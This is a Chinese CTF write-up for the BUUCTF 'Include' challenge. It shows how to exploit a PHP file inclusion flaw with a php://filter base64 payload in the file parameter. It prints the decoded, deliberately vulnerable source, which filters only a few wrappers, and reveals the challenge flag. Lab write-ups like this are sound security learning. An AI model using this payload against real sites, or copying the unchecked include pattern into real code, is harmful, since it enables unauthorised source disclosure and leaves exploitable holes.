BUUCTF-Web-[ACTF2020 新生赛]Include
打开题目环境,如下所示:
![BUUCTF-Web-[ACTF2020 新生赛]Include - 图1](/uploads/projects/bug132294@lmmitx/f3a46c6133119d1958d9abf1c99780b4.png)
点击tips:
![BUUCTF-Web-[ACTF2020 新生赛]Include - 图2](/uploads/projects/bug132294@lmmitx/ffb8eeed5bceacc898e0d69c5b3a940e.png)
结合题目名字,应该是文件包含相关
尝试读取当前文件目录,失败,应该是过滤了system函数
![BUUCTF-Web-[ACTF2020 新生赛]Include - 图3](/uploads/projects/bug132294@lmmitx/20fb1625dc3b9c1a7abb4c7fe4cce3df.png)
尝试获取首页源码:
http://99ccaa16-4df9-405d-b767-c67e1bec70bd.node3.buuoj.cn/?file=php://filter/read=convert.base64-encode/resource=./index.php
首页源码base64编码:
PG1ldGEgY2hhcnNldD0idXRmOCI+Cjw/cGhwCmVycm9yX3JlcG9ydGluZygwKTsKJGZpbGUgPSAkX0dFVFsiZmlsZSJdOwppZihzdHJpc3RyKCRmaWxlLCJwaHA6Ly9pbnB1dCIpIHx8IHN0cmlzdHIoJGZpbGUsInppcDovLyIpIHx8IHN0cmlzdHIoJGZpbGUsInBoYXI6Ly8iKSB8fCBzdHJpc3RyKCRmaWxlLCJkYXRhOiIpKXsKCWV4aXQoJ2hhY2tlciEnKTsKfQppZigkZmlsZSl7CglpbmNsdWRlKCRmaWxlKTsKfWVsc2V7CgllY2hvICc8YSBocmVmPSI/ZmlsZT1mbGFnLnBocCI+dGlwczwvYT4nOwp9Cj8+Cg==
解码:
<meta charset="utf8">
<?php
error_reporting(0);
$file = $_GET["file"];
if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
exit('hacker!');
}
if($file){
include($file);
}else{
echo '<a href="?file=flag.php">tips</a>';
}
?>
获取flag.php源码:
http://99ccaa16-4df9-405d-b767-c67e1bec70bd.node3.buuoj.cn/?file=php://filter/read=convert.base64-encode/resource=./flag.php
源码如下:
PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7YmY5MzNlMGQtY2EzZi00ODc0LThmNGMtYmIwMDQzM2ZiZGU2fQo=
解码如下,获得flag
<?php
echo "Can you find out the flag?";
//flag{bf933e0d-ca3f-4874-8f4c-bb00433fbde6}
若有收获,就点个赞吧
0 人点赞
